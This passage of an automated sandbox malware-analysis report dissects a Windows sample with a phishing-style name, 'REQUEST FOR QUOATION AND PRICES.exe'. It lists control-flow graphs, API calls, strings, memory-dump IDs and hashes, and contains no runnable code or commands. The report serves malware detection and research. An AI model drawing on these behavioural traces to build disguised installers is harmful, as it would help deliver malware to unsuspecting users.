                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet
                                                                                                                                • API String ID: 3751793516-632512459
                                                                                                                                • Opcode ID: 9bef887c5d5f536874f37580d62bfdc690f86322df1a9697a894e0e2e9f3eda4
                                                                                                                                • Instruction ID: 793db7a5d63411832aed35bcc9698a3b838560232fc9f0aff2bd133e4d1ca9b1
                                                                                                                                • Opcode Fuzzy Hash: 9bef887c5d5f536874f37580d62bfdc690f86322df1a9697a894e0e2e9f3eda4
                                                                                                                                • Instruction Fuzzy Hash: 8E11C271904100EBDF206FA0CD449AF7AB4FF14369B34463BF882B62E1D23D4941DA6E

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 803 10001771-100017ad call 10001b3e 807 100017b3-100017b7 803->807 808 100018be-100018c0 803->808 809 100017c0-100017cd call 100022eb 807->809 810 100017b9-100017bf call 100022a1 807->810 815 100017fd-10001804 809->815 816 100017cf-100017d4 809->816 810->809 819 10001824-10001828 815->819 820 10001806-10001822 call 1000248d call 100015cc call 10001280 GlobalFree 815->820 817 100017d6-100017d7 816->817 818 100017ef-100017f2 816->818 822 100017d9-100017da 817->822 823 100017df-100017e0 call 10002868 817->823 818->815 826 100017f4-100017f5 call 10002b23 818->826 824 10001866-1000186c call 1000248d 819->824 825 1000182a-10001864 call 100015cc call 1000248d 819->825 844 1000186d-10001871 820->844 828 100017e7-100017ed call 1000260b 822->828 829 100017dc-100017dd 822->829 835 100017e5 823->835 824->844 825->844 838 100017fa 826->838 843 100017fc 828->843 829->815 829->823 835->838 838->843 843->815 845 10001873-10001881 call 10002450 844->845 846 100018ae-100018b5 844->846 853 10001883-10001886 845->853 854 10001899-100018a0 845->854 846->808 851 100018b7-100018b8 GlobalFree 846->851 851->808 853->854 855 10001888-10001890 853->855 854->846 856 100018a2-100018ad call 10001555 854->856 855->854 857 10001892-10001893 FreeLibrary 855->857 856->846 857->854
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DA9
                                                                                                                                  • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DAE
                                                                                                                                  • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DB3
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 1000181C
                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 10001893
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100018B8
                                                                                                                                  • Part of subcall function 100022A1: GlobalAlloc.KERNEL32(00000040,405EA210), ref: 100022D3
                                                                                                                                  • Part of subcall function 1000260B: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017ED,00000000), ref: 1000267D
                                                                                                                                  • Part of subcall function 100015CC: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001749,00000000), ref: 100015E5
                                                                                                                                  • Part of subcall function 1000248D: wsprintfW.USER32 ref: 100024E1
                                                                                                                                  • Part of subcall function 1000248D: GlobalFree.KERNEL32(?), ref: 10002559
                                                                                                                                  • Part of subcall function 1000248D: GlobalFree.KERNEL32(00000000), ref: 10002582
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1661666940.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1661650069.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1661681060.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1661697008.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_10000000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1767494692-3916222277
                                                                                                                                • Opcode ID: ee44118ed5f66a04bcbaddb203534a3c862fc054acfad86daf15ba6692a0e061
                                                                                                                                • Instruction ID: b3d4579510dcbc356f87b8c5eb81e8e4ebd4f83f88234b59d07570181d0aa013
                                                                                                                                • Opcode Fuzzy Hash: ee44118ed5f66a04bcbaddb203534a3c862fc054acfad86daf15ba6692a0e061
                                                                                                                                • Instruction Fuzzy Hash: 7831BF799043459AFB10DF74DCC5BDA37E8EB043D4F058529F90AAA08EDF74A985C760

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 860 403062-403070 861 403072-403088 SetFilePointer 860->861 862 40308e-403097 call 40317d 860->862 861->862 865 403177-40317a 862->865 866 40309d-4030b0 call 405bd9 862->866 869 403163 866->869 870 4030b6-4030ca call 40317d 866->870 872 403165-403166 869->872 870->865 874 4030d0-4030d3 870->874 872->865 875 4030d5-4030d8 874->875 876 40313f-403145 874->876 879 403174 875->879 880 4030de 875->880 877 403147 876->877 878 40314a-403161 ReadFile 876->878 877->878 878->869 881 403168-403171 878->881 879->865 882 4030e3-4030ed 880->882 881->879 883 4030f4-403106 call 405bd9 882->883 884 4030ef 882->884 883->869 887 403108-40311d WriteFile 883->887 884->883 888 40313b-40313d 887->888 889 40311f-403122 887->889 888->872 889->888 890 403124-403137 889->890 890->882 891 403139 890->891 891->879
                                                                                                                                APIs
                                                                                                                                • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                                                                                • WriteFile.KERNELBASE(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$PointerWrite
                                                                                                                                • String ID: x>A
                                                                                                                                • API String ID: 539440098-3854404225
                                                                                                                                • Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                                                                                                • Instruction ID: dc2c699ff297b31fb9e84695071232237a0836a1395088a2783af72dccbdbb3b
                                                                                                                                • Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                                                                                                • Instruction Fuzzy Hash: A8312871500219EBDF10CF65EC44AAA3FBCEB08755F20813AF905AA1A0D3349E50DBA9

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 892 405b85-405b91 893 405b92-405bc6 GetTickCount GetTempFileNameW 892->893 894 405bd5-405bd7 893->894 895 405bc8-405bca 893->895 897 405bcf-405bd2 894->897 895->893 896 405bcc 895->896 896->897
                                                                                                                                APIs
                                                                                                                                • GetTickCount.KERNEL32 ref: 00405BA3
                                                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user~1\AppData\Local\Temp\), ref: 00405BBE
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\$nsa
                                                                                                                                • API String ID: 1716503409-3083371207
                                                                                                                                • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                                                                • Instruction ID: ce32066b90f2dd5c00c4c21114408b385ae8a9c1cc04399698be8057c3d71d7e
                                                                                                                                • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                                                                • Instruction Fuzzy Hash: B7F09676A00204BBDB008F59DC05F9BB7B9EB91710F10803AE901F7180E2B0BD40CB64
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                  • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                  • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                  • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                  • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                  • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                  • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                  • Part of subcall function 00405665: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                                                                  • Part of subcall function 00405665: CloseHandle.KERNEL32(?), ref: 00405697
                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                                                                • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3585118688-0
                                                                                                                                • Opcode ID: 806019d01c4059dad2e07343b2bd93566fca4abe4f6ec66dc814e8540e8620d4
                                                                                                                                • Instruction ID: 1710045f99402437403c6baccff52884d9c8abed8acdccfc98223cb8aca5cd2d
                                                                                                                                • Opcode Fuzzy Hash: 806019d01c4059dad2e07343b2bd93566fca4abe4f6ec66dc814e8540e8620d4
                                                                                                                                • Instruction Fuzzy Hash: DC11A171D04204EBCF109FA0CD459DE7AB5EB04318F20447BE505B61E0C3798A82DF99
                                                                                                                                APIs
                                                                                                                                • IsWindowVisible.USER32(?), ref: 00405137
                                                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405188
                                                                                                                                  • Part of subcall function 0040417B: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                                                                • Instruction ID: e96fcdb8fef6e8ad8397e3324e9c6cbe2a99463e9dbc89d2689884753c01e048
                                                                                                                                • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                                                                • Instruction Fuzzy Hash: 9C019E71A00608AFDF215F11DD84FAB3A26EB84354F104136FA007E2E0C37A8C929E69
                                                                                                                                APIs
                                                                                                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405697
                                                                                                                                Strings
                                                                                                                                • Error launching installer, xrefs: 00405678
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                • String ID: Error launching installer
                                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                                • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                                                                • Instruction ID: c7c859a2db999ab7639828e98f3e535764a8332e37e79a8a612d2f3195062982
                                                                                                                                • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                                                                • Instruction Fuzzy Hash: 19E0ECB4A01209AFEB009F64EC49A6B7BBCEB00744B908921A914F2250D778E8108A7D
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403512), ref: 004061E1
                                                                                                                                  • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                                                  • Part of subcall function 0040617E: CharNextW.USER32(?,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403512), ref: 004061F5
                                                                                                                                  • Part of subcall function 0040617E: CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403512), ref: 00406208
                                                                                                                                • CreateDirectoryW.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403512), ref: 00403347
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                • String ID: 1033$C:\Users\user~1\AppData\Local\Temp\
                                                                                                                                • API String ID: 4115351271-3049706366
                                                                                                                                • Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                                                                                                • Instruction ID: 15e16a0f1bb74d2da72680a3c6f5190242cf739030cfb371398593c950d8801c
                                                                                                                                • Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                                                                                                • Instruction Fuzzy Hash: 65D0C92250693171C55236663E06FCF166C8F4A32AF129077F805B90D6DB7C2A8245FE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                                                                • Instruction ID: 0bcb7f2cf841bf472a0df6abca0e2eee6c891e9108e2cead3d2ea24e9771fd10
                                                                                                                                • Opcode Fuzzy Hash: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                                                                • Instruction Fuzzy Hash: D6A15671E00229CBDF28CFA8C854BADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                                                • Instruction ID: 5ff8dc76d646c522b35349404ae71f3a07db7e5a5a41cf42f501ef55767b32d6
                                                                                                                                • Opcode Fuzzy Hash: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                                                • Instruction Fuzzy Hash: DD913470E04229CBEF28CF98C8547ADBBB1FF44305F15816AD852BB291C7789996DF44
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
